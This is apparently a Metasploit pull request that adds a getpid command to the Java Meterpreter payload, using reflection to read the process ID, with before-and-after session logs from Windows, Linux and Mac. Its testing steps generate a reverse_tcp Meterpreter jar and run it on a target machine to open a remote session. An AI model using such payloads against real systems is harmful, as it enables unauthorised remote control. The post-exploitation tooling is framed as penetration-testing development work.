### PR TITLE
Add getpid to Java Meterpreter

### DIFF
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/ExtensionLoader.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/ExtensionLoader.java
@@ -12,6 +12,7 @@ public interface ExtensionLoader {
     public static final int V1_4 = 14;
     public static final int V1_5 = 15;
     public static final int V1_6 = 16;
+    public static final int V1_9 = 19;
 
     /**
      * Load this extension.

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/NotYetImplementedCommand.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/command/NotYetImplementedCommand.java
@@ -106,7 +106,6 @@ public class NotYetImplementedCommand implements Command {
         typeNames.put(new Integer(TLVType.TLV_TYPE_MEMORY_STATE), "TLV_TYPE_MEMORY_STATE");
         typeNames.put(new Integer(TLVType.TLV_TYPE_MEMORY_TYPE), "TLV_TYPE_MEMORY_TYPE");
         typeNames.put(new Integer(TLVType.TLV_TYPE_ALLOC_PROTECTION), "TLV_TYPE_ALLOC_PROTECTION");
-        typeNames.put(new Integer(TLVType.TLV_TYPE_PID), "TLV_TYPE_PID");
         typeNames.put(new Integer(TLVType.TLV_TYPE_PROCESS_NAME), "TLV_TYPE_PROCESS_NAME");
         typeNames.put(new Integer(TLVType.TLV_TYPE_PROCESS_PATH), "TLV_TYPE_PROCESS_PATH");
         typeNames.put(new Integer(TLVType.TLV_TYPE_PROCESS_GROUP), "TLV_TYPE_PROCESS_GROUP");

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java
@@ -71,6 +71,6 @@ public class Loader implements ExtensionLoader {
         mgr.registerCommand(CommandId.STDAPI_UI_SEND_MOUSE, stdapi_ui_send_mouse.class, V1_4);
         mgr.registerCommand(CommandId.STDAPI_UI_SEND_KEYEVENT, stdapi_ui_send_keyevent.class, V1_4);
         mgr.registerCommand(CommandId.STDAPI_WEBCAM_AUDIO_RECORD, stdapi_webcam_audio_record.class, V1_4);
-        mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_GETPID, stdapi_sys_process_getpid.class, V1_5);
+        mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_GETPID, stdapi_sys_process_getpid.class, V1_5, V1_9);
     }
 }

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java
@@ -71,5 +71,6 @@ public class Loader implements ExtensionLoader {
         mgr.registerCommand(CommandId.STDAPI_UI_SEND_MOUSE, stdapi_ui_send_mouse.class, V1_4);
         mgr.registerCommand(CommandId.STDAPI_UI_SEND_KEYEVENT, stdapi_ui_send_keyevent.class, V1_4);
         mgr.registerCommand(CommandId.STDAPI_WEBCAM_AUDIO_RECORD, stdapi_webcam_audio_record.class, V1_4);
+        mgr.registerCommand(CommandId.STDAPI_SYS_PROCESS_GETPID, stdapi_sys_process_getpid.class, V1_5);
     }
 }

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_getpid.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_getpid.java
@@ -1,0 +1,5 @@
+package com.metasploit.meterpreter.stdapi;
+
+//Dummy class
+public class stdapi_sys_process_getpid {
+}

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_getpid_V1_5.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_getpid_V1_5.java
@@ -1,0 +1,49 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+import java.lang.reflect.Method;
+
+public class stdapi_sys_process_getpid_V1_5 implements Command {
+    private static boolean classExists(String className) {
+        try {
+            Class.forName(className);
+            return true;
+        } catch (ClassNotFoundException e) {
+            return false;
+        }
+    }
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        if (classExists("java.lang.ProcessHandle"))
+        {
+            Class<?> processHandleClass = Class.forName("java.lang.ProcessHandle");
+            Method getCurrentProcessHandleMethod = processHandleClass.getMethod("current");
+            Object currentProcessHandle = getCurrentProcessHandleMethod.invoke(null);
+            Object pidObject = processHandleClass.getMethod("pid").invoke(currentProcessHandle);
+            Long pid = (Long) pidObject;
+            response.add(TLVType.TLV_TYPE_PID, pid.intValue());
+            return ERROR_SUCCESS;
+        }
+        else if (classExists("java.lang.management.ManagementFactory") && classExists("java.lang.management.RuntimeMXBean"))
+        {
+            Class<?> managementFactory = Class.forName("java.lang.management.ManagementFactory");
+            Method runtimeBeanMethod = managementFactory.getMethod("getRuntimeMXBean");
+            Object runtimeBean = runtimeBeanMethod.invoke(null);
+            Class<?> runtimeBeanClass = Class.forName("java.lang.management.RuntimeMXBean");
+            Method nameMethod = runtimeBeanClass.getMethod("getName");
+            Object nameObj = nameMethod.invoke(runtimeBean);
+            String name = (String) nameObj;
+            Integer pid = Integer.parseInt(name.substring(0, name.indexOf("@")));
+            response.add(TLVType.TLV_TYPE_PID, pid);
+            return ERROR_SUCCESS;
+        }
+        else
+        {
+            return ERROR_FAILURE;
+        }
+    }
+}

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_getpid_V1_5.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_getpid_V1_5.java
@@ -18,17 +18,7 @@ public class stdapi_sys_process_getpid_V1_5 implements Command {
     }
 
     public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        if (classExists("java.lang.ProcessHandle"))
-        {
-            Class<?> processHandleClass = Class.forName("java.lang.ProcessHandle");
-            Method getCurrentProcessHandleMethod = processHandleClass.getMethod("current");
-            Object currentProcessHandle = getCurrentProcessHandleMethod.invoke(null);
-            Object pidObject = processHandleClass.getMethod("pid").invoke(currentProcessHandle);
-            Long pid = (Long) pidObject;
-            response.add(TLVType.TLV_TYPE_PID, pid.intValue());
-            return ERROR_SUCCESS;
-        }
-        else if (classExists("java.lang.management.ManagementFactory") && classExists("java.lang.management.RuntimeMXBean"))
+        if (classExists("java.lang.management.ManagementFactory") && classExists("java.lang.management.RuntimeMXBean"))
         {
             Class<?> managementFactory = Class.forName("java.lang.management.ManagementFactory");
             Method runtimeBeanMethod = managementFactory.getMethod("getRuntimeMXBean");

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_getpid_V1_9.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_getpid_V1_9.java
@@ -1,0 +1,36 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+import java.lang.reflect.Method;
+
+public class stdapi_sys_process_getpid_V1_9 implements Command {
+    private static boolean classExists(String className) {
+        try {
+            Class.forName(className);
+            return true;
+        } catch (ClassNotFoundException e) {
+            return false;
+        }
+    }
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        if (classExists("java.lang.ProcessHandle"))
+        {
+            Class<?> processHandleClass = Class.forName("java.lang.ProcessHandle");
+            Method getCurrentProcessHandleMethod = processHandleClass.getMethod("current");
+            Object currentProcessHandle = getCurrentProcessHandleMethod.invoke(null);
+            Object pidObject = processHandleClass.getMethod("pid").invoke(currentProcessHandle);
+            Long pid = (Long) pidObject;
+            response.add(TLVType.TLV_TYPE_PID, pid.intValue());
+            return ERROR_SUCCESS;
+        }
+        else
+        {
+            return ERROR_FAILURE;
+        }
+    }
+}


### PR DESCRIPTION
This PR adds the `getpid` command to Java meterpreter.
This is achieved through reflection.

The `ProcessHandle` class is available on Java versions 9 and above.
The `ManagerFactory` class is available on certain Java versions 5 and above.

When neither of the above methods are available, the process will fail, resulting in: `[-] stdapi_sys_process_getpid: Operation failed: 1`

I'm not aware of other methods that could be used to achieve this functionality; do let me know if there is something else that can be included as a backup approach. 👍 

# Testing
Meterpreter tests exist in metasploit framework already, so we can use them:

1. `use payload/java/meterpreter/reverse_tcp`
1. `generate -f jar -o meterpreter.jar`
1. `java -jar meterpreter.jar` on the target machine to get a session
1. In msfconsole, do `loadpath test/modules`
1. `use post/test/meterpreter`
1. `set verbose true`
1. `run SESSION=-1`
1. Confirm that the `Pid:` that is being shown is correct.

## Windows
<details>
<summary>Before</summary>

```
msf6 payload(java/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 12...

meterpreter > getpid
[-] The "getpid" command is not supported by this Meterpreter type (java/windows)
```

</details>

<details>
<summary>After</summary>

```
msf6 payload(java/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getpid
Current pid: 13937
```

</details>

## Linux
<details>
<summary>Before</summary>

```
msf6 payload(java/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getpid
[-] The "getpid" command is not supported by this Meterpreter type (java/linux)
```

</details>

<details>
<summary>After</summary>

```
msf6 payload(java/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 11...

meterpreter > getpid
Current pid: 6624
```

</details>

## Mac
<details>
<summary>Before</summary>

```
msf6 payload(java/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 13...

meterpreter > getpid
[-] The "getpid" command is not supported by this Meterpreter type (java/osx)
```

</details>

<details>
<summary>After</summary>

```
msf6 payload(java/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 8...

meterpreter > getpid
Current pid: 43636
```

</details>